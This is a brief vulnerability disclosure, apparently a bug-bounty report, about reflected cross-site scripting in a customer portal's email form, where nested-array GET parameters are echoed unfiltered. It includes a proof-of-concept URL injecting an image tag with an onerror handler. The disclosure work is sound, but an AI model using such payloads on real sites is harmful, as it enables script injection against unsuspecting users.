The affected resource is:
/customer/portal/emails/new All GET parameters are affected by this vulnerability, for example: email[body] email[subject] interaction[email] interaction[name]
The application does not filter the parameters if they are passed as nested arrays and reflects its content in the response. Here is a PoC:
⁄customer⁄portal⁄emails⁄new?email[body]=&email[subject][]=asd'>
<img onerror="prompt(1)" src="x" ⁄>&interaction[email]=&interaction[name]=